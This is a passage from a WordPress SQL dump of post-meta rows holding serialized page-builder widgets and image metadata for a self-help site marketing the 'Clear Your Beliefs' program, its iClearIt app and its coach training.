your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1169, 1653, '_wp_attached_file', '2014/10/IClearIt-website.png'),
(1170, 1653, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1349;s:6:"height";i:840;s:4:"file";s:28:"2014/10/IClearIt-website.png";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"IClearIt-website-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:28:"IClearIt-website-300x186.png";s:5:"width";i:300;s:6:"height";i:186;s:9:"mime-type";s:9:"image/png";}s:5:"large";a:4:{s:4:"file";s:29:"IClearIt-website-1024x637.png";s:5:"width";i:1024;s:6:"height";i:637;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:28:"IClearIt-website-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:28:"IClearIt-website-400x400.png";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:28:"IClearIt-website-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:28:"IClearIt-website-672x372.png";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:29:"IClearIt-website-1038x576.png";s:5:"width";i:1038;s:6:"height";i:576;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1172, 1655, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:689:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:796:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1171, 1654, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:689:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:956:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website-150x150.png" alt="IClearIt-website" width="150" height="150" class="aligncenter size-thumbnail wp-image-1653" /></a></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1173, 1656, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:689:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" 